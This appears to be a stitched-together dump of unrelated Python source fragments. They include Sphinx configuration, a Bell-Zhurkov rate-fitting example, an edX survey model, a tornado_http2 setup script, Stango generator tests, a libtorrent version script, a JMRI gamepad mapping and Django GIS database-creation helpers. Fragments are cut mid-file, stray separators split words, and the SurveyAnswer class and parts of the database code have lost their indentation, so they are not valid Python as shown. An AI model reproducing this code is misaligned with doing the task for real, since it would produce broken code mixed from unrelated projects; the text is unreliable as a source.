# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = 'Gatewaydoc'
# -- Options for LaTeX output --------------------------------------------------
# LaTeX settings: A4 paper, 12pt Palatino (mathpazo) and the flaskstyle package.
latex_elements = {
    'fontpkg' : r'\usepackage{mathpazo}',
    'papersize' : 'a4paper',
    'pointsize' : '12pt',
    'preamble' : r' \usepackage{flaskstyle}',
    # The paper size ('letterpaper' or 'a4paper').
    #'papersize': 'letterpaper',
    # The font size ('10pt', '11pt' or '12pt').
    #'pointsize': '10pt',
    # Additional stuff for the LaTeX preamble.
    #'preamble': '',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass [howto/manual]).
latex_documents = [
  ('index', 'Gateway.tex', u'Gateway Documentation',
   u'Stephane Wirtel', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
latex_use_parts = True
latex_use_modindex = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# flaskstyle.sty must ship alongside the generated LaTeX sources.
latex_additional_files = [
    'flaskstyle.sty',
]
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output --------------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
    ('index', 'gateway', u'Gateway Documentation',
     [u'Stephane Wirtel'], 1)
]
# If true, show URL addresses after external links.
#man_show_urls = False
# -- Options for Texinfo output ------------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
|
# force floating point division. Can still use integer with //
from __future__ import division
# This file is used for importing the common utilities classes.
import numpy as np
import matplotlib.pyplot as plt
import sys
sys.path.append("../../../../")
import BellZhurkov.Python.TestExamples.TestUtil.Bell_Test_Data as Data
import BellZhurkov.Python.Code.BellZhurkov as BellModel
def RunWoodsideFigure6():
    """
    Reproduces Figure 6 From:
    Woodside, Michael T., and Steven M. Block.
    "Reconstructing Folding Energy Landscapes by Single-Molecule Force Spectroscopy"
    Annual Review of Biophysics 43, no. 1 (2014): 19-39.
    doi:10.1146/annurev-biophys-051013-022754.
    See TestExamples.TestUtil.Bell_Test_Data.Woodside2014FoldingAndUnfoldingData

    Fits the Bell-Zhurkov model separately to the folding and unfolding
    rates and saves the resulting plot to ./Woodside2016_Figure6.png.
    NOTE(review): the plot title and output file say "2016" while the cited
    paper is from 2014 -- confirm which year is intended.
    """
    BellData = Data.Woodside2014FoldingAndUnfoldingData()
    Forces,Folding,Unfolding = (BellData.Forces,BellData.RatesFold,
                                BellData.RatesUnfold)
    # everything in SI initially
    # only DeltaG and DeltaX are free parameters; beta and k0 are fixed
    vary = dict(beta=False,
                k0=False,
                DeltaG=True,
                DeltaX=True)
    # beta = 1/(kB*T) at room temperature (kB*T ~ 4.1e-21 J)
    GuessDict = dict(beta=1/(4.1e-21),
                     k0=1,
                     DeltaX=20e-9,
                     DeltaG=0)
    opt = dict(Values=GuessDict,
               Vary=vary)
    # independent fits for the folding and the unfolding branch
    infFold = BellModel.BellZurkovFit(Forces,Folding,**opt)
    infUnfold = BellModel.BellZurkovFit(Forces,Unfolding,**opt)
    # get predictions along a (slightly larger) x range
    xMin=11e-12
    xMax=15e-12
    # how much should we interpolate?
    numPredict = (len(Forces)+1)*50
    xRangePredict = np.linspace(xMin,xMax,numPredict)
    predictFold = infFold.Predict(xRangePredict)
    predictUnfold = infUnfold.Predict(xRangePredict)
    # marker styling for the raw data points (no connecting line)
    markerDict = dict(marker='o',
                      markersize=7,
                      linewidth=0,
                      markeredgewidth=0.0)
    # solid black line for the model predictions
    lineDict = dict(linestyle='-',color='k',linewidth=1.5)
    # convert forces from Newtons to picoNewtons for plotting
    toPn = 1e12
    ForcePn = Forces*toPn
    fig = plt.figure()
    ax = plt.subplot(1,1,1)
    plt.plot(ForcePn,Folding,'ro',label="Folding",**markerDict)
    plt.plot(xRangePredict*toPn,predictFold,**lineDict)
    plt.plot(ForcePn,Unfolding,'bo',label="Unfolding",**markerDict)
    plt.plot(xRangePredict*toPn,predictUnfold,**lineDict)
    # rates span orders of magnitude, so use a log scale
    ax.set_yscale('log')
    # limits in PicoNewtons
    plt.xlim(xMin*toPn,xMax*toPn)
    plt.xlabel("Force (pN)")
    plt.ylabel("Rate (Hz)")
    plt.title("Woodside and Block, Figure 6a (2016)")
    plt.legend(loc='lower center')
    fig.savefig("./Woodside2016_Figure6.png")
def RunSchlierf2006Figure1a():
    """
    Fits the Bell-Zhurkov model to the folding-rate data of Schlierf 2006,
    Figure 1a (see TestExamples.TestUtil.Bell_Test_Data.Schlierf2006Figure1a).

    Returns:
        The fit object produced by BellModel.BellZurkovFit, so callers can
        inspect the fitted parameters. (Previously the result was assigned
        to an unused local and silently discarded.)
    """
    DataToTest = Data.Schlierf2006Figure1a()
    Forces, Folding = DataToTest.Forces, DataToTest.RatesFold
    # everything in SI initially; only k0 and DeltaX are free parameters
    vary = dict(beta=False,
                k0=True,
                DeltaG=False,
                DeltaX=True)
    # beta = 1/(kB*T) at room temperature; k0 and DeltaX are initial guesses
    GuessDict = dict(beta=1/(4.1e-21),
                     k0=0.35,
                     DeltaX=5e-10,
                     DeltaG=0)
    opt = dict(Values=GuessDict,
               Vary=vary)
    return BellModel.BellZurkovFit(Forces, Folding, **opt)
def run():
    """
    Runs examples of the Bell-Zhurkov Model, one after the other.
    """
    # Execute every bundled example in order.
    examples = (RunSchlierf2006Figure1a, RunWoodsideFigure6)
    for example in examples:
        example()
if __name__ == "__main__":
    run()
|
ort Course Surveys feature
"""
import logging
from lxml import etree
from collections import OrderedDict
from django.db import models
from student.models import User
from django.core.exceptions import ValidationError
from model_utils.models import TimeStampedModel
from survey.exceptions import SurveyFormNameAlreadyExists, SurveyFormNotFound
from xmodule_django.models import CourseKeyField
log = logging.getLogger("edx.survey")
class SurveyForm(TimeStampedModel):
    """
    Model to define a Survey Form that contains the HTML form data
    that is presented to the end user. A SurveyForm is not tied to
    a particular run of a course, to allow for sharing of Surveys
    across courses
    """
    # unique, indexed, human-readable identifier of the form
    name = models.CharField(max_length=255, db_index=True, unique=True)
    # raw HTML presented to the end user
    form = models.TextField()
    def __unicode__(self):
        return self.name
    def save(self, *args, **kwargs):
        """
        Override save method so we can validate that the form HTML is
        actually parseable
        """
        self.validate_form_html(self.form)
        # now call the actual save method
        super(SurveyForm, self).save(*args, **kwargs)
    @classmethod
    def validate_form_html(cls, html):
        """
        Makes sure that the html that is contained in the form field is valid
        and contains at least one form input field.

        Raises ValidationError when the HTML cannot be parsed or when no
        input fields are present.
        """
        try:
            fields = cls.get_field_names_from_html(html)
        except Exception as ex:
            log.exception("Cannot parse SurveyForm html: {}".format(ex))
            raise ValidationError("Cannot parse SurveyForm as HTML: {}".format(ex))
        # an empty field list means the form is useless to the end user
        if not fields:
            raise ValidationError("SurveyForms must contain at least one form input field")
    @classmethod
    def create(cls, name, form, update_if_exists=False):
        """
        Helper class method to create a new Survey Form.
        update_if_exists=True means that if a form already exists with that name, then update it.
        Otherwise raise a SurveyFormNameAlreadyExists exception
        """
        survey = cls.get(name, throw_if_not_found=False)
        if not survey:
            survey = cls(name=name, form=form)
        elif update_if_exists:
            survey.form = form
        else:
            raise SurveyFormNameAlreadyExists()
        # save() validates the form HTML before persisting
        survey.save()
        return survey
    @classmethod
    def get(cls, name, throw_if_not_found=True):
        """
        Helper class method to look up a Survey Form. Raises SurveyFormNotFound
        if it does not exist in the database, unless throw_if_not_found=False,
        in which case None is returned.
        """
        # EAFP: a single query instead of the previous exists() + get() pair
        try:
            return cls.objects.get(name=name)
        except cls.DoesNotExist:
            if throw_if_not_found:
                raise SurveyFormNotFound()
            return None
    def get_answers(self, user=None, limit_num_users=10000):
        """
        Returns all answers for all users for this Survey
        """
        return SurveyAnswer.get_answers(self, user, limit_num_users=limit_num_users)
    def has_user_answered_survey(self, user):
        """
        Returns whether a given user has supplied answers to this
        survey
        """
        return SurveyAnswer.do_survey_answers_exist(self, user)
    def save_user_answers(self, user, answers, course_key):
        """
        Store answers to the form for a given user. Answers is a dict of simple
        name/value pairs
        IMPORTANT: There is no validation of form answers at this point. All data
        supplied to this method is presumed to be previously validated
        """
        # first remove any answer the user might have done before
        self.clear_user_answers(user)
        SurveyAnswer.save_answers(self, user, answers, course_key)
    def clear_user_answers(self, user):
        """
        Removes all answers that a user has submitted
        """
        SurveyAnswer.objects.filter(form=self, user=user).delete()
    def get_field_names(self):
        """
        Returns a list of defined field names for all answers in a survey. This can be
        helpful for reporting like features, i.e. adding headers to the reports
        This is taken from the set of <input> fields inside the form.
        """
        return SurveyForm.get_field_names_from_html(self.form)
    @classmethod
    def get_field_names_from_html(cls, html):
        """
        Returns a list of defined field names from a block of HTML
        """
        names = []
        # make sure the form is wrapped in some outer single element
        # otherwise lxml can't parse it
        # NOTE: This wrapping doesn't change the ability to query it
        tree = etree.fromstring(u'<div>{}</div>'.format(html))
        # all elements that can carry user input
        input_fields = (
            tree.findall('.//input') + tree.findall('.//select') +
            tree.findall('.//textarea')
        )
        for input_field in input_fields:
            if 'name' in input_field.keys() and input_field.attrib['name'] not in names:
                names.append(input_field.attrib['name'])
        return names
class SurveyAnswer(TimeStampedModel):
"""
Model for the answers that a user gives for a particular form in a course
"""
user = models.ForeignKey(User, db_index=True)
form = models.ForeignKey(SurveyForm, db_index=True)
field_name = models.CharField(max_length=255, db_index=True)
field_value = models.CharField(max_length=1024)
# adding the course_id where the end-user answered the survey question
# since it didn't exist in the beginning, it is nullable
course_key = CourseKeyField(max_length=255, db_index=True, null=True)
@classmethod
def do_survey_answers_exist(cls, form, user):
"""
Returns whether a user has any answers for a given SurveyForm for a course
This can be used to determine if a user has taken a CourseSurvey.
"""
return SurveyAnswer.objects.filter(form=form, user=user).exists()
@classmethod
def get_answers(cls, form, user=None, limit_num_users=10000):
"""
Returns all answers a user (or all users, when user=None) has given to an instance of a SurveyForm
Return is a nested dict which are simple name/value pairs with an outer key which is the
user id. For example (where 'field3' i | s an optional field):
results = {
'1': {
'field1': 'value1',
'field2': 'value2',
},
'2': {
'field1': 'value3',
'field2': 'value4',
'field3': 'value5',
}
:
:
}
limit_num_users is to prevent an unintentional huge, | in-memory dictionary.
"""
if user:
answers = SurveyAnswer.objects.filter(form=form, user=user)
else:
answers = SurveyAnswer.objects.filter(form=form)
results = OrderedDict()
num_users = 0
for answer in answers:
user_id = answer.user.id
if user_id not in results and num_users < limit_num_users:
results[user_id] = OrderedDict()
num_users = num_users + 1
if user_id in results:
results[user_id][answer.field_name] = answer.field_value
return results
@classmethod
def save_answers(cls, form, user, answers, course_key):
"""
Store answers to the form for a given user. Answers is a dict of simple
name/value pairs
IMPORTANT: There is no validaton of form answers at this point. All data
supplied to this method is presumed to be previously validated
"""
for name in answers.keys():
value = answers[name]
# See if there is an answer stored for this user, form, field_name pair or not
# this will allow for update cases. This does include an additional lookup,
# but write operations will be relatively infrequent
value = answers[name]
defaults = {"field_value": value}
if course_key:
|
import sys
# Prefer setuptools (needed for install_requires); fall back to plain
# distutils when setuptools is not installed.
try:
    import setuptools
    from setuptools import setup
except ImportError:
    setuptools = None
    from distutils.core import setup
version = '0.0.1'
kwargs = {}
if setuptools is not None:
    kwargs['install_requires'] = ['tornado>=4.3']
    # enum34 backports the stdlib enum module to Python < 3.4
    if sys.version_info < (3, 4):
        kwargs['install_requires'].append('enum34')
setup(
    name='tornado_http2',
    version=version,
    packages=['tornado_http2', 'tornado_http2.test'],
    # non-Python data files shipped inside the packages
    package_data={
        'tornado_http2': [
            'hpack_static_table.txt',
            'hpack_huffman_data.txt',
        ],
        'tornado_http2.test': [
            'test.crt',
            'test.key',
        ],
    },
    **kwargs)
|
import io
import os
import unittest
from stango import Stango
from stango.files import Files
from . import StangoTestCase, make_suite, view_value, view_template
# A view that renders an empty string, for tests where content is irrelevant.
dummy_view = view_value('')
class GenerateTestCase(StangoTestCase):
    """
    Tests for Stango.generate(): rendering the configured files into a
    destination directory, including index-file handling, accepted view
    return types, error reporting, and post_render_hook behavior.
    """
    def setup(self):
        # fresh temp output dir and a manager with the default index file
        self.tmp = self.tempdir()
        self.manager = Stango()
        self.manager.index_file = 'index.html'
    def test_generate_simple(self):
        # two files: the index (empty path) and a named text file
        self.manager.files += [
            ('', view_value('foobar')),
            ('barfile.txt', view_value('barfoo')),
        ]
        self.manager.generate(self.tmp)
        self.eq(sorted(os.listdir(self.tmp)), ['barfile.txt', 'index.html'])
        with open(os.path.join(self.tmp, 'index.html')) as fobj:
            self.eq(fobj.read(), 'foobar')
        with open(os.path.join(self.tmp, 'barfile.txt')) as fobj:
            self.eq(fobj.read(), 'barfoo')
    def test_generate_dest_is_non_dir(self):
        # generating into a path that is a regular file must fail cleanly
        self.manager.files = Files(
            ('', dummy_view),
        )
        dest_path = os.path.join(self.tmp, 'dest.txt')
        with open(dest_path, 'w') as fobj:
            fobj.write('foo')
        exc = self.assert_raises(ValueError, self.manager.generate, dest_path)
        self.eq(str(exc), "'%s' is not a directory" % dest_path)
        # Check the file wasn't modified
        self.eq(os.listdir(self.tmp), ['dest.txt'])
        with open(os.path.join(self.tmp, 'dest.txt'), 'r') as fobj:
            self.eq(fobj.read(), 'foo')
    def test_generate_outdir_exists(self):
        # Create a file and a directory to outdir
        with open(os.path.join(self.tmp, 'foo'), 'w') as fobj:
            fobj.write('bar')
        os.mkdir(os.path.join(self.tmp, 'dummydir'))
        self.eq(sorted(os.listdir(self.tmp)), ['dummydir', 'foo'])
        self.manager.files = Files(
            ('', view_value('baz')),
        )
        self.manager.generate(self.tmp)
        # Check that the old destdir contents were removed
        self.eq(os.listdir(self.tmp), ['index.html'])
    def test_generate_different_index_file(self):
        # a custom index_file name is used for the empty path
        self.manager.index_file = 'foofile.txt'
        self.manager.files += [
            ('', view_value('foobar')),
            ('barfile.txt', view_value('barfoo')),
        ]
        self.manager.generate(self.tmp)
        self.eq(sorted(os.listdir(self.tmp)), ['barfile.txt', 'foofile.txt'])
        with open(os.path.join(self.tmp, 'foofile.txt')) as fobj:
            self.eq(fobj.read(), 'foobar')
        with open(os.path.join(self.tmp, 'barfile.txt')) as fobj:
            self.eq(fobj.read(), 'barfoo')
    def test_view_returns_a_bytes_object(self):
        # bytes returned by a view are written verbatim
        self.manager.files = Files(
            ('', view_value(b'\xde\xad\xbe\xef')),
        )
        self.manager.generate(self.tmp)
        self.eq(os.listdir(self.tmp), ['index.html'])
        with open(os.path.join(self.tmp, 'index.html'), 'rb') as fobj:
            self.eq(fobj.read(), b'\xde\xad\xbe\xef')
    def test_view_returns_a_bytearray_object(self):
        # bytearray is accepted the same way as bytes
        self.manager.files = Files(
            ('', view_value(bytearray(b'\xba\xdc\x0f\xfe'))),
        )
        self.manager.generate(self.tmp)
        self.eq(os.listdir(self.tmp), ['index.html'])
        with open(os.path.join(self.tmp, 'index.html'), 'rb') as fobj:
            self.eq(fobj.read(), b'\xba\xdc\x0f\xfe')
    def test_view_returns_a_filelike_object_with_str_contents(self):
        # file-like objects are read and their str contents written out
        self.manager.files = Files(
            ('', view_value(io.StringIO('foobar'))),
        )
        self.manager.generate(self.tmp)
        self.eq(os.listdir(self.tmp), ['index.html'])
        with open(os.path.join(self.tmp, 'index.html'), 'r') as fobj:
            self.eq(fobj.read(), 'foobar')
    def test_view_returns_a_filelike_object_with_bytes_contents(self):
        # file-like objects with bytes contents are also accepted
        self.manager.files = Files(
            ('', view_value(io.BytesIO(b'barfoo'))),
        )
        self.manager.generate(self.tmp)
        self.eq(os.listdir(self.tmp), ['index.html'])
        with open(os.path.join(self.tmp, 'index.html'), 'r') as fobj:
            self.eq(fobj.read(), 'barfoo')
    def test_view_renders_a_template(self):
        # template views render with the supplied context dict
        self.manager.template_dirs.insert(0, self.template_path)
        self.manager.files = Files(
            ('', view_template('value.txt'), {'value': 'foobar'})
        )
        self.manager.generate(self.tmp)
        self.eq(os.listdir(self.tmp), ['index.html'])
        with open(os.path.join(self.tmp, 'index.html')) as fobj:
            self.eq(fobj.read(), 'value is: foobar')
    def test_no_index_file(self):
        # a directory path without an index_file is an error
        self.manager.index_file = None
        self.manager.files = Files(
            ('quux/', dummy_view),
        )
        exc = self.assert_raises(ValueError, self.manager.generate, self.tmp)
        self.eq(str(exc), "Directory path and no index_file: 'quux/'")
    def test_view_returns_None(self):
        self.manager.files = Files(
            ('', view_value(None)),
        )
        exc = self.assert_raises(ValueError, self.manager.generate, self.tmp)
        self.eq(str(exc), "The result of view 'value_returner' for path '' is not a str, bytes or bytearray instance or a file-like object")
    def test_view_returns_an_integer(self):
        self.manager.files = Files(
            ('foo.txt', view_value(1)),
        )
        exc = self.assert_raises(ValueError, self.manager.generate, self.tmp)
        self.eq(str(exc), "The result of view 'value_returner' for path 'foo.txt' is not a str, bytes or bytearray instance or a file-like object")
    def test_view_returns_a_filelike_object_with_invalid_contents(self):
        # a file-like object whose read() yields a non-string is rejected
        class InvalidFile(object):
            def read(self):
                return 42
        self.manager.files = Files(
            ('', view_value(InvalidFile())),
        )
        exc = self.assert_raises(ValueError, self.manager.generate, self.tmp)
        self.eq(str(exc), "Contents of the file-like object, returned by view 'value_returner' for path '', is not a str, bytes or bytearray instance")
    def test_post_render_hook(self):
        # the hook receives the rendered bytes and may transform them
        def post_render_hook(context, data):
            return data + b' hurr durr'
        self.manager.add_hook('post_render_hook', post_render_hook)
        self.manager.files = Files(
            ('', view_value('foobar')),
        )
        self.manager.generate(self.tmp)
        self.eq(os.listdir(self.tmp), ['index.html'])
        with open(os.path.join(self.tmp, 'index.html'), 'rb') as fobj:
            self.eq(fobj.read(), b'foobar hurr durr')
    def test_post_render_hook_returns_None(self):
        # a hook must return bytes; returning None is an error
        self.manager.add_hook('post_render_hook', lambda x, y: None)
        self.manager.files = Files(
            ('', view_value('foobar')),
        )
        exc = self.assert_raises(ValueError, self.manager.generate, self.tmp)
        self.eq(str(exc), 'The result of post_render_hook is not a bytes or bytearray instance for index.html')
def suite():
    """Build the unittest suite covering GenerateTestCase."""
    test_case = GenerateTestCase
    return make_suite(test_case)
|
"""
This module contains transfor | mation functio | ns (clip->clip)
One file for one fx. The file's name is the fx's name
"""
|
#! /usr/bin/env python
import os
import sys
import glob
# Expected invocation: set_version.py <major> <minor> <tiny> <tag>
version = (int(sys.argv[1]), int(sys.argv[2]), int(sys.argv[3]), int(sys.argv[4]))
def substitute_file(name, version_tuple=None):
    """
    Rewrite the version numbers embedded in the given file, in place.

    Which substitutions apply depends on the file's name/extension, so the
    same routine can patch C++ headers (.hpp), autoconf input (.ac), CMake
    lists (.txt), docs (.rst), Jamfiles and setup.py files. Lines that do
    not match any known pattern are copied through unchanged.

    name          -- path of the file to rewrite
    version_tuple -- (major, minor, tiny, tag) to substitute; defaults to
                     the module-level ``version`` parsed from sys.argv.
                     (Optional parameter added for testability; existing
                     callers are unaffected.)
    """
    ver = version if version_tuple is None else version_tuple
    subst = ''
    # Use context managers so both the read and the write handle are always
    # closed (the original leaked both).
    with open(name) as f:
        for l in f:
            if '#define LIBTORRENT_VERSION_MAJOR' in l and name.endswith('.hpp'):
                l = '#define LIBTORRENT_VERSION_MAJOR %d\n' % ver[0]
            elif '#define LIBTORRENT_VERSION_MINOR' in l and name.endswith('.hpp'):
                l = '#define LIBTORRENT_VERSION_MINOR %d\n' % ver[1]
            elif '#define LIBTORRENT_VERSION_TINY' in l and name.endswith('.hpp'):
                l = '#define LIBTORRENT_VERSION_TINY %d\n' % ver[2]
            elif '#define LIBTORRENT_VERSION ' in l and name.endswith('.hpp'):
                l = '#define LIBTORRENT_VERSION "%d.%d.%d.%d"\n' % (ver[0], ver[1], ver[2], ver[3])
            elif 'AC_INIT([libtorrent-rasterbar]' in l and name.endswith('.ac'):
                l = 'AC_INIT([libtorrent-rasterbar],[%d.%d.%d],[arvid@libtorrent.org],\n' % (ver[0], ver[1], ver[2])
            elif 'set (VERSION ' in l and name.endswith('.txt'):
                l = 'set (VERSION "%d.%d.%d")\n' % (ver[0], ver[1], ver[2])
            elif ':Version: ' in l and (name.endswith('.rst') or name.endswith('.py')):
                l = ':Version: %d.%d.%d\n' % (ver[0], ver[1], ver[2])
            elif 'VERSION = ' in l and name.endswith('Jamfile'):
                l = 'VERSION = %d.%d.%d ;\n' % (ver[0], ver[1], ver[2])
            elif 'version=' in l and name.endswith('setup.py'):
                l = "\tversion = '%d.%d.%d',\n" % (ver[0], ver[1], ver[2])
            elif "version = '" in l and name.endswith('setup.py'):
                l = "\tversion = '%d.%d.%d',\n" % (ver[0], ver[1], ver[2])
            subst += l
    # 'w' truncates and rewrites the file (the original used 'w+' and never
    # closed the handle)
    with open(name, 'w') as out:
        out.write(subst)
# Patch every file in the source tree that embeds the version number.
substitute_file('include/libtorrent/version.hpp')
substitute_file('CMakeLists.txt')
substitute_file('configure.ac')
substitute_file('bindings/python/setup.py')
substitute_file('docs/gen_reference_doc.py')
for i in glob.glob('docs/*.rst'):
    substitute_file(i)
substitute_file('Jamfile')
|
print "Loading USBDriver : Logitech Cordless RumblePad 2"
class USBDriver :
    """
    Mapping profile for a Logitech Cordless RumblePad 2 gamepad.

    Each attribute pair names a gamepad component (as reported by the input
    library; "" means unassigned) and the component value that triggers the
    corresponding JMRI throttle action.
    """
    def __init__(self):
        self.componentNextThrottleFrame = "Hat Switch" # Component for throttle frames browsing
        self.valueNextThrottleFrame = 0.5
        self.componentPreviousThrottleFrame = "Hat Switch"
        self.valuePreviousThrottleFrame = 1
        self.componentNextRunningThrottleFrame = "" # Component for running throttle frames browsing
        self.valueNextRunningThrottleFrame = 0.75
        self.componentPreviousRunningThrottleFrame = ""
        self.valuePreviousRunningThrottleFrame = 0.25
        # From there available only when no throttle is active in current window
        self.componentNextRosterBrowse = "Hat Switch" # Component for roster browsing
        self.valueNextRoster = 0.75
        self.componentPreviousRosterBrowse = "Hat Switch"
        self.valuePreviousRoster = 0.25
        self.componentRosterSelect = "Button 4" # Component to select a roster
        self.valueRosterSelect = 1
        # From there available only when a throttle is active in current window
        self.componentThrottleRelease = "Button 5" # Component to release current throttle
        self.valueThrottleRelease = 1
        self.componentSpeed = "X Axis" # Analog axis component for current throttle speed
        self.valueSpeedTrigger = 0.05 # ignore values lower than
        self.componentSpeedMultiplier = .5 # multiplier for pad value (negative values to reverse)
        self.componentSpeedIncrease = ""
        self.valueSpeedIncrease = 1
        self.componentSpeedDecrease = ""
        self.valueSpeedDecrease = 1
        self.componentDirectionForward = "Z Rotation" # Analog axis component for current throttle direction
        self.valueDirectionForward = -1
        self.componentDirectionBackward = "Z Rotation"
        self.valueDirectionBackward = 1
        self.componentStopSpeed = "Button 7" # Preset speed button stop, double tap will Estop
        self.valueStopSpeed = 1
        self.componentSlowSpeed = "" # Preset speed button slow
        self.valueSlowSpeed = 1
        self.componentCruiseSpeed = "" # Preset speed button cruise, double tap will max speed
        self.valueCruiseSpeed = 1
        self.componentMaxSpeed = "" # Preset speed button max
        self.valueMaxSpeed = 1
        # Function buttons F0..F29: trigger component, "on" value, and the
        # "off" event value used for non-lockable (momentary) functions.
        self.componentF0 = "Button 0" # Function button
        self.valueF0 = 1
        self.valueF0Off = 0 # off event for non lockable functions
        self.componentF1 = "Button 1" # Function button
        self.valueF1 = 1
        self.valueF1Off = 0
        self.componentF2 = "Button 2" # Function button
        self.valueF2 = 1
        self.valueF2Off = 0
        self.componentF3 = "Button 3" # Function button
        self.valueF3 = 1
        self.valueF3Off = 0
        self.componentF4 = "" # Function button
        self.valueF4 = 1
        self.valueF4Off = 0
        self.componentF5 = "" # Function button
        self.valueF5 = 1
        self.valueF5Off = 0
        self.componentF6 = "" # Function button
        self.valueF6 = 1
        self.valueF6Off = 0
        self.componentF7 = "" # Function button
        self.valueF7 = 1
        self.valueF7Off = 0
        self.componentF8 = "" # Function button
        self.valueF8 = 1
        self.valueF8Off = 0
        self.componentF9 = "" # Function button
        self.valueF9 = 1
        self.valueF9Off = 0
        self.componentF10 = "" # Function button
        self.valueF10 = 1
        self.valueF10Off = 0
        self.componentF11 = "" # Function button
        self.valueF11 = 1
        self.valueF11Off = 0
        self.componentF12 = "" # Function button
        self.valueF12 = 1
        self.valueF12Off = 0
        self.componentF13 = "" # Function button
        self.valueF13 = 1
        self.valueF13Off = 0
        self.componentF14 = "" # Function button
        self.valueF14 = 1
        self.valueF14Off = 0
        self.componentF15 = "" # Function button
        self.valueF15 = 1
        self.valueF15Off = 0
        self.componentF16 = "" # Function button
        self.valueF16 = 1
        self.valueF16Off = 0
        self.componentF17 = "" # Function button
        self.valueF17 = 1
        self.valueF17Off = 0
        self.componentF18 = "" # Function button
        self.valueF18 = 1
        self.valueF18Off = 0
        self.componentF19 = "" # Function button
        self.valueF19 = 1
        self.valueF19Off = 0
        self.componentF20 = "" # Function button
        self.valueF20 = 1
        self.valueF20Off = 0
        self.componentF21 = "" # Function button
        self.valueF21 = 1
        self.valueF21Off = 0
        self.componentF22 = "" # Function button
        self.valueF22 = 1
        self.valueF22Off = 0
        self.componentF23 = "" # Function button
        self.valueF23 = 1
        self.valueF23Off = 0
        self.componentF24 = "" # Function button
        self.valueF24 = 1
        self.valueF24Off = 0
        self.componentF25 = "" # Function button
        self.valueF25 = 1
        self.valueF25Off = 0
        self.componentF26 = "" # Function button
        self.valueF26 = 1
        self.valueF26Off = 0
        self.componentF27 = "" # Function button
        self.valueF27 = 1
        self.valueF27Off = 0
        self.componentF28 = "" # Function button
        self.valueF28 = 1
        self.valueF28Off = 0
        self.componentF29 = "" # Function button
        self.valueF29 = 1
        self.valueF29Off = 0
|
the command-line options for the shell command
options = get_cmd_options(db_name)
# Constructing the 'createlang' command.
createlang_cmd = 'createlang %splpgsql' % options
if verbosity >= 1: print createlang_cmd
# Must have database super-user privileges to execute createlang -- it must
# also be in your path.
status, output = getstatusoutput(createlang_cmd)
# Checking the status of the command, 0 => execution successful
if status:
raise Exception("Error executing 'plpgsql' command: %s\n" % output)
def _create_with_cursor(db_name, verbosity=1, autoclobber=False):
"Creates database with psycopg2 cursor."
# Constructing the necessary SQL to create the database (the DATABASE_USER
# must possess the privileges to create a database)
create_sql = 'CREATE DATABASE %s' % connection.ops.quote_name(db_name)
if settings.DATABASE_USER:
create_sql += ' OWNER %s' % settings.DATABASE_USER
cursor = connection.cursor()
_set_autocommit(connection)
try:
# Trying to create the database first.
cursor.execute(create_sql)
#print create_sql
except Exception, e:
# Drop and recreate, if necessary.
if not autoclobber:
confirm = raw_input("\nIt appears the database, %s, already exists. Type 'yes' to delete it, or 'no' to cancel: " % db_name)
if autoclobber or confirm == 'yes':
if verbosity >= 1: print 'Destroying old spatial database...'
drop_db(db_name)
if verbosity >= 1: print 'Creating new spatial database...'
cursor.execute(create_sql)
else:
raise Exception('Spatial Database Creation canceled.')
# NOTE(review): 'foo' aliases _create_with_cursor and looks like leftover
# debugging code -- confirm whether any caller relies on it before removing.
foo = _create_with_cursor
# Matches createdb's error output when the target database already exists.
created_regex = re.compile(r'^createdb: database creation failed: ERROR: database ".+" already exists')
def _create_with_shell(db_name, verbosity=1, autoclobber=False):
    """
    If no spatial database already exists, then using a cursor will not work.
    Thus, a `createdb` command will be issued through the shell to bootstrap
    creation of the spatial database.

    May prompt interactively (raw_input) before dropping an existing
    database unless autoclobber=True.
    """
    # Getting the command-line options for the shell command
    options = get_cmd_options(False)
    create_cmd = 'createdb -O %s %s%s' % (settings.DATABASE_USER, options, db_name)
    if verbosity >= 1: print create_cmd
    # Attempting to create the database.
    status, output = getstatusoutput(create_cmd)
    if status:
        # Non-zero exit: distinguish "already exists" from any other failure.
        if created_regex.match(output):
            if not autoclobber:
                confirm = raw_input("\nIt appears the database, %s, already exists. Type 'yes' to delete it, or 'no' to cancel: " % db_name)
            if autoclobber or confirm == 'yes':
                if verbosity >= 1: print 'Destroying old spatial database...'
                drop_cmd = 'dropdb %s%s' % (options, db_name)
                status, output = getstatusoutput(drop_cmd)
                if status != 0:
                    raise Exception('Could not drop database %s: %s' % (db_name, output))
                if verbosity >= 1: print 'Creating new spatial database...'
                status, output = getstatusoutput(create_cmd)
                if status != 0:
                    raise Exception('Could not create database after dropping: %s' % output)
            else:
                raise Exception('Spatial Database Creation canceled.')
